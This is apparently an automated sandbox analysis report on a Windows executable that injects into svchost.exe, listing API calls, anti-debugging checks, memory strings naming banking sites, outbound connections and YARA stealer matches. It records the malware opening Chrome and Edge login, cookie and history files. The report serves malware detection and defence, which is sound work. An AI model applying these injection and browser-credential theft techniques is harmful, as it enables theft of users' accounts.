              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00663B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00663B12
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0066BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0066BCBC
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006049A0
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599297Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599187Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599077Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598968Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598859Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598745Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598640Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598531Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598421Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598312Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597765Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597546Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597437Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597328Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597218Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597109Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596671Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596562Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596338Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596125Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595796Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595687Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595578Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595468Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595359Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595250Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595140Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595031Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594921Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594812Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594703Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594593Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594484Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594374Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594265Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594156Jump to behavior
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3933512000.000000000326B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: svchost.exe, 00000002.00000002.3936515105.0000000006695000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
              Source: svchost.exe, 00000002.00000002.3936515105.00000000066F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeAPI call chain: ExitProcess graph end nodegraph_0-101258
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeAPI call chain: ExitProcess graph end nodegraph_0-101034
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09049578 LdrInitializeThunk,2_2_09049578
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00673F09 BlockInput,0_2_00673F09
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00603B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00603B3A
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00635A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00635A7C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00604B37 LoadLibraryA,GetProcAddress,0_2_00604B37
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_01645260 mov eax, dword ptr fs:[00000030h]0_2_01645260
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_01645200 mov eax, dword ptr fs:[00000030h]0_2_01645200
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_01643BD0 mov eax, dword ptr fs:[00000030h]0_2_01643BD0
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_006580A9
              Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0062A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0062A155
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0062A124 SetUnhandledExceptionFilter,0_2_0062A124
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.122.130.0 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.80.1 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EAB008Jump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006587B1 LogonUserW,0_2_006587B1
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00603B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00603B3A
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_006048D7
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00664C7F mouse_event,0_2_00664C7F
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\lsc5QN46NH.exe"Jump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00657CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00657CAF
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0065874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0065874B
              Source: lsc5QN46NH.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: lsc5QN46NH.exeBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_0062862B cpuid 0_2_0062862B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,2_2_00417A20
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00634E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00634E87
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00641E06 GetUserNameW,0_2_00641E06
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_00633F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00633F3A
              Source: C:\Users\user\Desktop\lsc5QN46NH.exeCode function: 0_2_006049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006049A0
              Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000002.00000002.3934335927.0000000005341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTR
              Source: Yara matchFile source: 2.2.svchost.exe.7c00f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326b000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326bf20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326bf20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326b000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7ca0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7c00f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000003.1516352480.000000000326B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3939679598.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3939349051.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3933759853.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6012, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
